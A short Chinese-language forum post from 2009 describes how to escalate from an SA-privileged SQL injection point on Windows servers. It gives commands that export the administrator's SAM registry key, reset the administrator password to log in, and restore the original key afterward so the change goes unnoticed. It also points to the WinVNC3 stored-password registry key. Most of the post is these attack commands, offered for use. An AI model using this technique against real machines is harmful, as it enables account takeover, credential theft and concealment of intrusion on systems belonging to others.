|
|
发表于 2009-12-10 15:41:12
|显示全部楼层
SA权限的注射点的时候,我们能够使用系统自带的一些命令来读取注册表键信息.sa默认是SYSTEM权限,可以读sam键.regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 win2Kreg ...
SA权限的注射点的时候,我们能够使用系统自带的一些命令来读取注册表键信息.
sa默认是SYSTEM权限,可以读sam键.
regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 win2K
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg win2003
读出来后,我们就可以直接更改管理员密码进行登陆了:
net user administrator test
用administrator登陆.
用完机器后
reg import c:\test.reg
根本不用克隆.
但是要注意,一定要找到对应的sid.
HKEY_CURRENT_USER\Software\ORL\WinVNC3
HKCU\Software\ORL\WinVNC3\Password |
|
狗仔卡
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡